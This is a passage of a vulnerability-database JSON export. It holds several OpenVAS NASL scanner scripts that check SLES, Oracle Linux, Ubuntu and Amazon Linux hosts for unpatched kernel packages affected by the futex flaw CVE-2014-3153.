isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~0.7.21.1\", 
rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-trace\", 
rpm:\"xen-kmp-trace~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "Oracle Linux Local Security Checks ELSA-2014-3037", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123400", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3037.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123400\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:19 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3037\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3037 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3037\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3037.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", 
rpm:\"dtrace-modules~3.8.13~35.1.1.el6uek~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dtrace-modules-headers\", rpm:\"dtrace-modules-headers~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dtrace-modules-provider-headers\", rpm:\"dtrace-modules-provider-headers~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-06-09T00:00:00", "id": "OPENVAS:1361412562310841845", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310841845", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-2237-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2237_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-2237-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841845\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-09 14:35:15 +0530 (Mon, 09 Jun 2014)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-2237-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Pinkie Pie discovered a flaw in the Linux kernel's 
futex\nsubsystem. An unprivileged local user could exploit this flaw to cause a denial\nof service (system crash) or gain administrative privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2237-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2237-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-51-generic\", ver:\"3.5.0-51.77~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120340", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-363)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely 
excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120340\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:01 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-363)\");\n script_tag(name:\"insight\", value:\"The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system. 
You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-363.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", 
rpm:\"kernel-doc~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "Oracle Linux Local Security Checks ELSA-2014-3038", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123398", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3038", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3038.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123398\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3038\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3038 - unbreakable enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3038\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3038.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", 
rpm:\"kernel-uek~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "Oracle Linux Local Security Checks ELSA-2014-3039", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123399", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3039", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3039.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123399\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:18 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3039\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3039 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3039\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3039.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", 
rpm:\"kernel-uek~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el5uek~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el5uekdebug~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el5uek~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el5uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", 
rpm:\"kernel-uek~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el6uek~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el6uekdebug~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el6uek~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el6uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
